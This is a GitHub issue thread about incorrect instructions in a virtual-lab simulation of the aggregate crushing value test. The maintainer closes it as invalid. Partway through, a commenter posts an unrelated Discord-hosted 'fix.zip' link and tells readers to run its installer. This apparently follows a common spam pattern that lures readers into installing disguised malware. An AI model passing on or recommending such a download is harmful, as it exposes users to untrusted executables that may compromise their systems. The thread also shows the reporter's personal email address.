### ISSUE TITLE
[BUG REPORT] Virtual Labs Crushing Value of Aggregate

### ISSUE THREAD

**Issue by vlabs-bug** [virtual-labs/bugs-virtual-labs#1674]
### **Bug Reported on 3 September, 11:36 GMT +5:50 in** 
Lab - Transportation Engineering
Experiment - Crushing Value of Aggregate
**Type(s) of Issue -**
* Insufficient/Incorrect Instructions

Additional info- the tamping rod must be left upwardly so that it can fall freely.

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 OPR/113.0.0.0
Experiment Link - https://ts-nitk.vlabs.ac.in/exp/crushing-value/simulation.html
Email - rajatsingh32831@gmail.com

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by SOLVE-NITK** [comment]
Issue doesn't seem to fit the content of the experiment. Hence marking it as invalid and closing it.
